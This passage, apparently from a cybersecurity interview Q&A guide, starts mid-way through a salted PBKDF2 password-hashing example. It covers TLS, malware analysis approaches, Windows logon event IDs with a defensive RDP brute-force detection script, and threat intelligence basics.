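
def verify(password: str, salt: bytes, stored: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time, so the
    comparison's timing does not leak how many leading bytes matched."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    print("encoded :", encode(b"hello"), "->", decode(encode(b"hello")))
    print("sha256  :", digest(b"hello"))
    salt, stored = new_credential("hunter2")
    print("salt    :", salt.hex())
    print("pbkdf2  :", stored.hex())
    print("verify  :", verify("hunter2", salt, stored), verify("hunter3", salt, stored))
```

The point of the salt shows up in the test: the same password with two different salts yields two unrelated hashes, so a precomputed table for one salt is useless against the other.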

✓ What are the differences between SSL and TLS?

• TLS (Transport Layer Security) is the successor of SSL (Secure Sockets Layer). SSL 2.0 and 3.0 are deprecated because of known weaknesses; TLS 1.2 and TLS 1.3 are the versions that should be in use today. The name 'SSL' is still used informally for TLS (for example, 'SSL certificates').

✓ What is the name of the software that compiles written code?

• Compiler

✓ What is the name of the software that translates machine code into assembly language?

• Disassembler

✓ What is the difference between static and dynamic malware analysis?

• Static analysis: The approach of analyzing malicious software through reverse engineering methods without executing it. Generally, the malware is decompiled / disassembled and every step it will execute is analyzed, so its behavior / capability can be understood.

• Dynamic analysis: The approach that examines the behavior of malicious software on a system by executing it. In dynamic analysis, tools that monitor the system (event logs, files, the network, and processes) are installed, and the behavior is examined while the malicious software runs, typically in an isolated sandbox.

• It should also be kept in mind that using a single approach may not be enough to analyze the malware. Using both approaches together gives the best results.
✓ How does malware achieve persistence on Windows?

• Services
• Registry run keys (Run, RunOnce)
• Task Scheduler (scheduled tasks)
• Infecting clean files

✓ What event logs are available by default in Windows?

• Security
• Application
• System

✓ With which Security event ID can a successful RDP connection be detected?

• 4624 (An account was successfully logged on)

✓ Which event ID can be used to detect failed logins?

• 4625 (An account failed to log on)

✓ In which field of which event should I look to be able to detect RDP logins?

• You can detect RDP login activity with event ID 4624. The value of the "Logon Type" field must be 10 (RemoteInteractive).
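The three answers above combine into one detection: a burst of 4625 events from a source followed by a 4624 with Logon Type 10 from the same source. The following is an added example, not part of the original guide: the rules in Python over a constructed list of Security-log events that carry only the fields the rules use (the usernames, addresses and timestamps are made up; in practice the events come from EVTX/XML exports or a SIEM).

```python
"""Windows Security log detections: RDP logons and failed-logon bursts.

Added example for this guide, not code from the original document. The
events are constructed and carry only the fields the rules use; in a real
pipeline they would come from EVTX/XML exports or a SIEM. Event IDs 4624
(successful logon) and 4625 (failed logon) and Logon Type 10
(RemoteInteractive, i.e. RDP) are the real Windows values.
"""
from collections import Counter, defaultdict

# Constructed events, already in chronological order.
EVENTS = [
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "jdoe",
     "IpAddress": "203.0.113.7", "TimeCreated": "2024-05-01T10:00:00"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "asmith",
     "IpAddress": "-", "TimeCreated": "2024-05-01T10:00:05"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup",
     "IpAddress": "10.0.0.8", "TimeCreated": "2024-05-01T10:00:09"},
    # twelve failed logons for 'administrator' from one source in one minute...
    *[{"EventID": 4625, "LogonType": 3, "TargetUserName": "administrator",
       "IpAddress": "198.51.100.23", "TimeCreated": f"2024-05-01T10:01:{i:02d}"}
      for i in range(12)],
    {"EventID": 4625, "LogonType": 2, "TargetUserName": "asmith",
     "IpAddress": "-", "TimeCreated": "2024-05-01T10:02:00"},
    # ...followed by a successful RDP logon from the same source
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "administrator",
     "IpAddress": "198.51.100.23", "TimeCreated": "2024-05-01T10:02:30"},
]

LOGON_TYPE_NAMES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
                    7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
                    10: "RemoteInteractive", 11: "CachedInteractive"}


def rdp_logons(events):
    """Successful RDP sessions: EventID 4624 with Logon Type 10."""
    return [e for e in events if e["EventID"] == 4624 and e["LogonType"] == 10]


def failed_logon_bursts(events, threshold=10):
    """Source addresses with at least `threshold` 4625 events: brute force or
    password spraying candidates. Returns {ip: count}."""
    counts = Counter(e["IpAddress"] for e in events if e["EventID"] == 4625)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def brute_force_then_rdp(events, threshold=10):
    """Highest-priority finding: a source with a 4625 burst that later gets a
    successful 4624 / type 10 logon. Timestamps are ISO-8601 strings, so
    plain string comparison preserves chronological order."""
    last_failure = defaultdict(str)
    for e in events:
        if e["EventID"] == 4625:
            ip = e["IpAddress"]
            last_failure[ip] = max(last_failure[ip], e["TimeCreated"])
    bursts = failed_logon_bursts(events, threshold)
    return [e for e in rdp_logons(events)
            if e["IpAddress"] in bursts and e["TimeCreated"] > last_failure[e["IpAddress"]]]


if __name__ == "__main__":
    for e in rdp_logons(EVENTS):
        kind = LOGON_TYPE_NAMES[e["LogonType"]]
        print(f"{kind} logon: {e['TargetUserName']} from {e['IpAddress']} at {e['TimeCreated']}")
    print("failed-logon bursts:", failed_logon_bursts(EVENTS))
    for e in brute_force_then_rdp(EVENTS):
        print(f"ALERT brute force then RDP success: {e['TargetUserName']} from {e['IpAddress']}")
```

One caveat when tuning this on real data: with Network Level Authentication enabled, the credential check for an RDP connection is logged as a Logon Type 3 event before the Type 10 session is created, so failed RDP attempts often appear as 4625 with Logon Type 3, exactly as the constructed burst above shows.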
✓ What is Cyber Threat Intelligence (CTI)?

Threat intelligence is the analysis of data using tools and techniques to generate meaningful information about existing or emerging threats targeting the organization that helps mitigate risks. Threat intelligence helps organizations make faster, more informed security decisions and change their behavior from reactive to proactive in the fight against attacks.

✓ What are STIX and TAXII in Cyber Threat Intelligence (CTI)?

STIX (Structured Threat Information eXpression) is a standardized language and serialization format (JSON in STIX 2.x) for describing threat intelligence such as indicators, malware, and threat actors. TAXII (Trusted Automated eXchange of Intelligence Information) defines how cyber threat information can be shared via services and message exchanges; it is the transport protocol typically used to distribute STIX content.

✓ Name some threat intelligence platforms.

• IBM X-Force Exchange, Cisco Talos, AlienVault OTX

✓ What are the types of threat intelligence?

• Strategic threat intelligence
• Tactical threat intelligence
• Technical threat intelligence
• Operational threat intelligence